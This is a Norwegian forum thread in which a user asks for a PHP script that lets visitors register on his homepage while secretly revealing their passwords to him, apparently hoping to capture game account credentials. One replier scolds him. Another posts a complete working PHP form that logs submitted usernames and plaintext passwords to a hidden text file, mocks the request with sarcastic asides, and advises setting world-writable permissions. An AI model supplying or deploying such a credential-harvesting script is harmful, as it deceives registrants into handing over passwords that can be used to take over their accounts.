Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  8 1804
God Kveld
Noen som vet hvordan man lager ein php script som folk kan registrere seg på hjemmesiden min, og som gjør at passordet vil bli sent til meg sånn at eg får vite passordet hva deres er
Sist endret av hisaris; 8. desember 2007 kl. 18:33. Grunn: skrivefeil!
Hvorfor er tittelen login script?
Vet du om hosten i det hele tatt støtter PHP?
Sist endret av TanteSpiker; 8. desember 2007 kl. 18:42.
Sitat av Grantax
Hvorfor er tittelen login script?
Vet du om hosten i det hele tatt støtter PHP?
Vis hele sitatet...
Den støtter PHP ja
NOOOOOOOOOOOOOOOOOO-
robhol's Avatar
Dette er jo ikke noe login-script da. Det er noe av det feigeste jeg har hørt om.
Dessuten er det ikke sikkert at de registrerer seg i det hele tatt, eller at de bruker samme passord som WoW/Runescape/Steam*** / whatever crappy spill du vil ha accounts til.
Limited edition
Moff's Avatar
Dette skulle gjøre susen:

Kode

<?

if ( !empty ( $_POST['passord'] ) && !empty ( $_POST['brukernavn'] ) ) {

$fil = fopen ( 'hemmelig_fil.txt', 'a' );

$tekst = date ( 'd.m.Y - H:i' ) . ' - ' . $_POST['brukernavn'] . ' - ' . $_POST['passord'] . '\n';

fwrite ( $fil, $tekst );

fclose ( $fil );

?>

Du er nå registrert! (Yeah, right...)

<?

} else {

?>

Registrer deg:<br />

<form method="post">

Velg et brukernavn:<br />

<input type="text" name="brukernavn" style="width: 150px; border: 1px solid #999" /><br />

Velg et passord:<br />

<input type="password" name="passord" style="width: 150px; border: 1px solid #999" /><br />

<input type="submit" value="Registrer ny bruker" style="width: 150px; border: 1px solid #999" />

</form>

<?

}

?>
Sett den inn på nettsida di, så skal du se hvor mange venner du får.
Vil bare legge til en ting; Du har aldri tenkt over hvorfor det ikke finnes så mange nettsider som driver med dette...?

Edit: En notis hvis du virkelig ikke aner hva skriptet gjør: Det oppretter en fil kalt "hemmelig_fil.txt" og lister opp brukernavn og passord sammen med dato og klokkeslett. Dette krever at skriptet har skriverettigheter på serveren. Du kan sette +777, da det gir fulle rettigheter.
Sist endret av Moff; 8. desember 2007 kl. 19:12.
jeg får bare opp ein feilmelding (Method Not Allowed
The requested method POST is not allowed for the URL /.) Ka som gjør det?
Evt. installer et cms system. Jeg anbefaler e107 og joomla
Jeg har et registreringscript som fungerer at det sendes på epost, og jeg manuelt legger brukernavn og passord inn i en fil som eksempel users.php. Dette funker fint til innlogging til en enkel hjemmeside, men er sikkert ikke noe å satse på til noen veldig seriøse sider. Hvis du vil ha dette scriptet, kan du bare sende en melding.
Trådstarter
31 1
Sitat av chb
Jeg har et registreringscript som fungerer at det sendes på epost, og jeg manuelt legger brukernavn og passord inn i en fil som eksempel users.php. Dette funker fint til innlogging til en enkel hjemmeside, men er sikkert ikke noe å satse på til noen veldig seriøse sider. Hvis du vil ha dette scriptet, kan du bare sende en melding.
Vis hele sitatet...
Jeg vil gjerne ha scriptet